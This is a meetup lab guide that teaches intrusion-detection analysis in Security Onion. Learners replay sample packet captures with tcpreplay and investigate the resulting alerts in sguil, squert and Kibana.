View on GitHub

Presentations

DC919 | March 2019 | IDS/IPS Intro Lab Exercises

Author: wavelength ( @__wavelength__ )

Introduction

These exercises are meant only as brief introductions to the tools and interfaces available in Security Onion.

Pre-requisites

You should have a Security Onion VM completely setup to proceed.\ Ideally, you will have a snapshot of the fresh install that you can revert to between exercises.

You should have some familiarity with Linux to be able to complete these exercises.\ Some step-by-step instructions are provided to familiarize you with Security Onion or to ensure that exercises work as intended.

Downloads

The following files should be downloaded to your Security Onion:\ https://github.com/wave-length/Presentations/raw/master/MAR19-DC919-SecurityOnion/Files/Ex1-honeynet.org-Scan19.tar.gz \ https://s3.amazonaws.com/tcpreplay-pcap-files/bigFlows.pcap

Exercise 1 - Intro to squil

  1. Once you have logged into your VM, open a terminal window by clicking on “Applications”, then “Utilities” and scroll down to and click “Terminal”. Change directory to where you have stored the downloaded Exercise pcaps. If you used the Chromium web browser, those files are stored in the “Downloads” directory.
  2. Extract the files contained in Ex1-honeynet.org-Scan19.tar.gz by using the following command:\ mkdir ./Exercise1/ && tar fvxz Ex1-honeynet.org-Scan19.tar.gz --directory ./Exercise1
  3. Change directory into the “Exercise1” directory.
  4. Minimize the terminal window and double-click the “Squil” icon on the desktop. Login to Squil using the credentials that you setup when you built the Security Onion VM; note that these are not the same credentials you use to login to the system. A new window will appear asking which networks to monitor. There should be two options - seconion-ossec and seconion-enxxxx. Ignore the interface labelled “ossec”; make note of what follows the hyphen on the interface starting with “en”. It should be something something similar to enp#s#, where the #-signs are numbers. This is the name of the capture Ethernet interface used for monitoring and it will be needed later. Click “Select All” once you have noted the Ethernet interface name and then “Start SGUIL.” The sguil interface should appear. Make sure that the “RealTime Events” tab is selected and the box under the tab is is clear of events. If there are events listed, click one and press F8 to clear it. If there are more than one, keep pressing F8 until they are all cleared.
  5. Bring the terminal back to the foreground. At the command line, enter the following command:\ sudo sleep 15s && sudo tcpreplay -i <Ethernet interface name> -M 100 newdat3.log\ For example, if the name of your capture Ethernet interface is “enp0s8”, the command would be as follows:\ sudo sleep 15s && sudo tcpreplay -i enp0s8 -M 100 newdat3.log\ When you press enter, you will be prompted for the sudo password; use the password used to login to the VM. Then switch back to the sguil screen and wait.
  6. In about fifteen seconds, long enough to switch back to squil, tcpreplay will replay the newdat3.log pcap file and events will appear in squil. There should be roughly 15 events. Let’s take a look at some of them.
  7. Click on the event with the Event Message of “GPL TELNET Bad Login”. The fields at the bottom of the window should populate. If they do not, make sure that the checkboxes next to “Reverse DNS”, “Enable External DNS”, “Show Packet Data” and “Show Rule” are all checked.
  8. Let’s find out where this failed login attempt possibly originated from… Next to “Whois Query” are three radio buttons; select “Src IP” and wait for the field under that to populate. Scroll down in that field until you see “country:”. What two letter country code is present? You can use Google to determine what country this is, or, if you scroll down to the “address:” fields, you can find it there. What country is the possible source of this attack?
  9. Now that we have determined where the attack IP is likely located, we conclude that this is an unauthorized access attempt since we do not know anyone in that country that would accessing this system. Squil allows you to Classify events based on the results of an investigation. To classify this event, right-click on the “RT” on the left of the row for this event. In the pop-up menu, go to “Update Event Status” and then chose “CAT III - Attempted Unauthorized Access (F3)”. You can also select the event and press F3. The event will not disappear from the “RealTime Events” field.
  10. The “RealTime Events” view allows you to see events as they are generated by the IDS. As a SOC analyst monitoring an IDS, this is the event queue from which you would pick and investigate events. Now, say you want to look at all of the events that have been classified as “Attempted Unauthorized Access”. To do this, select “Query” from the squil menu bar, choose “Query by Category” and then the “CAT III: Attempted Unauthorized Access” query. This opens a query builder screen. With the query builder function, you can query the events catalogued by Security Onion. For this exercise, click the “Submit” button. A new tab with the query results will appear and the event you classified in Step 9 should be displayed. When you are ready to continue, close this tab using the “Close” button in the upper left corner.
  11. Squil also allows you to perform packet analysis in the same interface. Select the event labelled “ET ATTACK_RESPONSE Possible /etc/passwd via SMTP (linux style)”. The fields at the bottom should populate; if they do not, make sure the checkboxes referenced in Step 7 are checked. Using the blue-color coded fields on the bottom right of the screen, we can see the header and payload information for the packet, including source and destination IP and port. The “DATA” field is where we want to dig for information on this attack. According to the event description, someone attempted to email the contents of the /etc/passwd file to someone. Using the information in the “DATA” field, examine the packet payload and determine the recipient of the file. What is the recipient (TO:) email address?

Exercise 2 - Intro to squert

  1. Minimize the squil interface and open the squert interface by using the icon on the desktop. The login is the same username and password as squil. Once logged in, clear all of the alerts in the squert interface. This is done by clicking on the red square next to an event and then clicking the “No Action Req’d” option on the left side of the window under “Classification”. The classification section of interface is similar to the Classify section in squil. We will try this functionality out shortly.
  2. Go back to your terminal once all of the events are cleared in squert. Change directory to ‘/opt/examples’ by typing ‘cd /opt/examples’. Run tcpreplay, as shown in Exercise 1, and import bredolab-sample.pcap.\ sudo tcpreplay -i <Ethernet interface name> -M 100 bredolab.pcap\ You will probably be prompted for your sudo password, as in Exercise 1; again, this is the same password you used to login to the VM.
  3. Once tcpreplay completes, in squert, click the interface refresh button at the top of the screen. It will be two arrows making a circle and may be marked with a red exclamation point. After clicking this icon, at least six alerts should appear in the squert interface; if they do not, wait and click the refresh button again.
  4. Click the alert marked “ET Trojan Tibs/Harnig Downloaded Activity”. Note the information that appears - the IDPS signature, including some links to information and event specific information, such as time, source host and destination host.
  5. Under “Categorize 4 Event(s)”, click the red square with the number four in it. The number indicates the number of times something, in this case packets, triggered this alert. Additional rows will appear for each of the captured packets and their capture times. Click the event ID for any one of the packets. This will initiate a pivot from squert to the capME! interface. Here you will be able to examine the contains of the captured packet and, if desired, download a PCAP from the system of offline analysis.
  6. Using the information presented in the capME! interface, what was the domain from which this Trojan was downloaded? Hint: Look at the lines marked “SRC”.
  7. Using the information presented in the capME! interface, it appears that the webserver sent something back - what? Hint: Look at the lines marked “DST”.
  8. It looks like this might be malicious. We have the ability to classify events in squert, just like squil. Close the capME! tab and go back to the squert interface. The event for “ET Trojan Tibs/Harnig Downloaded Activity” should still be selected. Make sure “Categorize 4 Event(s)” is still displayed in the event and then click the link on the left labelled “malicious” under “Classification”. If “Categorize 4 Event(s)” instead says “Categorize 0 Event(s)” or another number, click the checkbox under the red square with four in it until “Categorize 4 Event(s)” is displayed and click the “malicious” category link.
  9. The event we were just looking at now will disappear from the queue. To view it again, click the number four next to malicious in the “Classification” section. To view the queue again after trying this, click the “YES” next to “Filtered By Object” near the top right right of the interface. Doing this will display all of the events in the system, including categorized events. Click the “OFF” next to “queue only” and then the “refresh” button to restore the queue.

Exercise 3 - Intro to Kibana

  1. This exercise will require a lot of data, so we will be using the bigFlows.pcap provided by the author of tcpreplay. Load this pcap the same way we have loaded the pcaps in Exercises 1 and 2:\ sudo tcpreplay -i <Ethernet interface name> -M 100 bigFlows.pcap
  2. This pcap will take a minute or two to load into Security Onion and be analyzed. While that is happening, you can minimize the terminal window and open Kibana using the link on your Security Onion desktop. If you are prompted to login, it is the same credentials used for squil and squert.
  3. Check that the pcap has completed loading by checking the terminal window for statistics stating the number of packets “Attempted” and “Successful” as both being 791,615. If the actual numbers are different, that is OK.
  4. Go back to Kibana interface and click on the “Dashboard” item in the left menu. The Dashboard screen will appear in the content pane provide you information on the types of traffic and events processed by Security Onion. Click on the “HTTP” option in the “Bro Hunting” menu in the grey content pane. Once the pane updates, scroll through the content that is presented. You can see information like the countries that hosts are communicating with, the types of content that are loaded, the domains that are contacted and user-agent strings. This information is generated by the Bro(Zeek) engine running on the Security Onion system.
  5. Let’s try another data view. Scroll back to the top of the content pane and click “NIDS” under “Alert Data”. When the pane updates, take a look around. You will be able to see information like the type of alert, source and destination IPs, source and destination ports, countries contacted and frequency data.
  6. Click on “Bro Notices” under “Alert Data”. There should be some alerts for expired SSL certificates. This illustates the power of Bro. It has the ability to not only inspect SSL certs, but other header and client information, such as user-agent strings, to glean intelligence about the environment.
  7. Now let’s take a look at the data visualization capabilities of Kibana. Click on the “Visualize” item in the left hand menu. From the list of visualizations, select “Bro - Connections - Service By Destination Country”. The content pane will update with a visual graph of the countries contacted and graphs showing how often destination ports were contacted.
  8. Click back on the “Visualize” item in the left hand menu again. In the search field in the content pane, type in “Map” and from the results, select “Connections - Destination - Sum of Total Bytes (Tile Map)”. The content pane will update and display a map with circles in various locations. The circles are placed on the guesstimated locations for hosts that were the destination of packets transmitted on the network. The size and color of the circles are determined based on the amount of data sent to those hosts.
  9. Kibana, its query language and capabilities encompass such a large body of information that there are entire books and classes on it. Feel free to poke around and try out the different visualizations or a few queries. Kibana is read only so there is no risk of data corruption or deletion experimenting with it.

Play around on your own…

Now that you have the basics, feel free to try replaying other pcap files and see what you get. There many freely downloadable pcap files out there that. One such list can be found at https://www.netresec.com/?page=pcapfiles or try out some of the other files in the /opt/samples directory of your Security Onion installation.

You can also take a look through the Security Onion documentation at https://securityonion.readthedocs.io/en/latest/